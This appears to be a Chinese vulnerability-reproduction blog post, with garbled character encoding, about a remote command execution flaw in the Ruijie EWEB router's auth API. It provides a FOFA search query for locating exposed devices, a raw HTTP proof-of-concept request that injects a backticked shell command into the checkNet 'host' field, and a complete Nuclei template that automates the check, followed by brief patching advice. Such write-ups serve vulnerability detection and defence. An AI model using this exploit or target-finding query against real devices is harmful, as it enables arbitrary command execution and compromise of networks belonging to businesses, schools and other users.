免責(zé)聲明:文章來(lái)源互聯(lián)網(wǎng)收集整理,請(qǐng)勿利用文章內(nèi)的相關(guān)技術(shù)從事非法測(cè)試,由于傳播、利用此文所提供的信息或者工具而造成的任何直接或者間接的后果及損失,均由使用者本人負(fù)責(zé),所產(chǎn)生的一切不良后果與文章作者無(wú)關(guān)。該文章僅供學(xué)習(xí)用途使用。
?? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ?
??? ? ? ? ? ? ? ? ?
Ⅰ、漏洞描述
銳捷睿易是銳捷網(wǎng)絡(luò)針對(duì)商業(yè)市場(chǎng)的子品牌。擁有易網(wǎng)絡(luò)、交換機(jī)、路由器、無(wú)線、安全、云服務(wù)六大產(chǎn)品線,解決方案涵蓋商貿(mào)零售、酒店、KTV、網(wǎng)吧、監(jiān)控安防、物流倉(cāng)儲(chǔ)、制造業(yè)、中小教育、中小醫(yī)療、中小政府等商業(yè)用戶。
auth接口存在RCE漏洞,惡意攻擊者可能會(huì)利用該漏洞執(zhí)行惡意命令,進(jìn)而導(dǎo)致服務(wù)器失陷。
Ⅱ、fofa語(yǔ)句
body="cgi-bin/luci" && body="#f47f3e"
Ⅲ、漏洞復(fù)現(xiàn)
POC
POST /cgi-bin/luci/api/auth HTTP/1.1
Host: 127.0.0.1
Content-Type: application/json
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
{"method":"checkNet","params":{"host":"`echo Hello World!>test.txt`"}}
1、構(gòu)建poc
2、訪問(wèn)上傳文件
http://127.0.0.1/cgi-bin/test.txt
Ⅳ、Nuclei-POC
id: Ruijie-EWEB-auth-REC
info:
name: auth接口存在RCE漏洞,惡意攻擊者可能會(huì)利用該漏洞執(zhí)行惡意命令,進(jìn)而導(dǎo)致服務(wù)器失陷。
author: WLF
severity: high
metadata:
fofa-query: body="cgi-bin/luci" && body="#f47f3e"
variables:
filename: "{{to_lower(rand_base(10))}}"
boundary: "{{to_lower(rand_base(20))}}"
http:
- raw:
- |
POST /cgi-bin/luci/api/auth HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
{"method":"checkNet","params":{"host":"`echo Hello World!>{{filename}}.txt`"}}
- |
GET /cgi-bin/{{filename}}.txt HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/119.0
matchers:
- type: dsl
dsl:
- status_code==200 && contains_all(body,"Hello World!")
Ⅴ、修復(fù)建議
1、請(qǐng)聯(lián)系廠商進(jìn)行修復(fù)或升級(jí)到安全版本;
2、如非必要,禁止公網(wǎng)訪問(wèn)該系統(tǒng);文章來(lái)源:http://www.zghlxwxcb.cn/news/detail-838805.html
3、設(shè)置白名單訪問(wèn)。文章來(lái)源地址http://www.zghlxwxcb.cn/news/detail-838805.html
到了這里,關(guān)于【漏洞復(fù)現(xiàn)】銳捷 EWEB auth 遠(yuǎn)程命令執(zhí)行漏洞的文章就介紹完了。如果您還想了解更多內(nèi)容,請(qǐng)?jiān)谟疑辖撬阉鱐OY模板網(wǎng)以前的文章或繼續(xù)瀏覽下面的相關(guān)文章,希望大家以后多多支持TOY模板網(wǎng)!